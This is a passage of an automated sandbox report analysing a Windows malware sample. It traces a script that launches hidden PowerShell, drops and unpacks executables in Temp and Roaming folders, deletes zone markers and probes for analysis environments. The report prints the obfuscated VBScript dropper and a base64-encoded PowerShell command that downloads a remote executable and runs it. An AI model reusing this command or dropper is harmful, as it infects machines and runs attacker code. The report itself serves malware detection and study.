        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeSection loaded: msimg32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeSection loaded: msvcr100.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\fbhbvciSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\fbhbvciSection loaded: msimg32.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\fbhbvciSection loaded: msvcr100.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

        Data Obfuscation

        barindex
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeUnpacked PE file: 5.2.oBuf.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
        Source: C:\Users\user\AppData\Roaming\fbhbvciUnpacked PE file: 9.2.fbhbvci.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: createobject("sh"& e &"ll.application")execute("pow = ""pow""& e &""rsh""& e &""ll""")sh.ShellExecute "cmD."& e &"x"& e, "/c "& pow &" -nop -w hidd"& e &"n -"& e &"p bypass -"& e &"nc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=", "", "op"& e &"n", 0'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvihervuheirhviheruhvieuviuehrviherhvierhfherihvirehvhrve'jojfojweoijfowefwefoijweofijwoeijfowejfoiwejfoijweoifjweojfoiwejfoweoifjowiejfowiejfojwefjwoeijfiowejfiojweoijfoiewjfoijwoejfwefj'joifjiorjfoiwejfoweijfohirbgfvinfvunevuireiuveuirhviurheiurvhiherihveiurhvi
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B7C4165 push eax; ret 3_2_00007FFD9B7C418D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B7C418E push eax; ret 3_2_00007FFD9B7C418D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B7C00AD pushad ; iretd 3_2_00007FFD9B7C00C1
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_0040237B push 000023C2h; retn 0023h5_2_0040238B
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_004025DC push ebp; ret 5_2_004025FC
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00401284 pushad ; iretd 5_2_00401286
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_006A2643 push ebp; ret 5_2_006A2663
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_006A12EB pushad ; iretd 5_2_006A12ED
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_006A23E2 push 000023C2h; retn 0023h5_2_006A23F2
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00792164 pushad ; iretd 5_2_00792166
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_0078E34C pushad ; retn 0078h5_2_0078E34D
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_0078E6D4 push eax; retf 5_2_0078E725
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_007953B9 push ebx; ret 5_2_007953BC
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_0079899C push esp; ret 5_2_0079899D
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeCode function: 5_2_00793C89 push es; retf 5_2_00793CA0
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_0040237B push 000023C2h; retn 0023h9_2_0040238B
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_004025DC push ebp; ret 9_2_004025FC
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_00401284 pushad ; iretd 9_2_00401286
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_007B2643 push ebp; ret 9_2_007B2663
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_007B12EB pushad ; iretd 9_2_007B12ED
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_007B23E2 push 000023C2h; retn 0023h9_2_007B23F2
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_008313A4 pushad ; iretd 9_2_008313A6
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_00832EC9 push es; retf 9_2_00832EE0
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_00837BDC push esp; ret 9_2_00837BDD
        Source: C:\Users\user\AppData\Roaming\fbhbvciCode function: 9_2_008345F9 push ebx; ret 9_2_008345FC
        Source: oBuf.exe.3.drStatic PE information: section name: .text entropy: 7.486630625699931
        Source: fbhbvci.8.drStatic PE information: section name: .text entropy: 7.486630625699931
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\oBuf.exeJump to dropped file
        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\fbhbvciJump to dropped file
        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\fbhbvciJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\fbhbvci:Zone.Identifier read attributes | deleteJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\oBuf.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
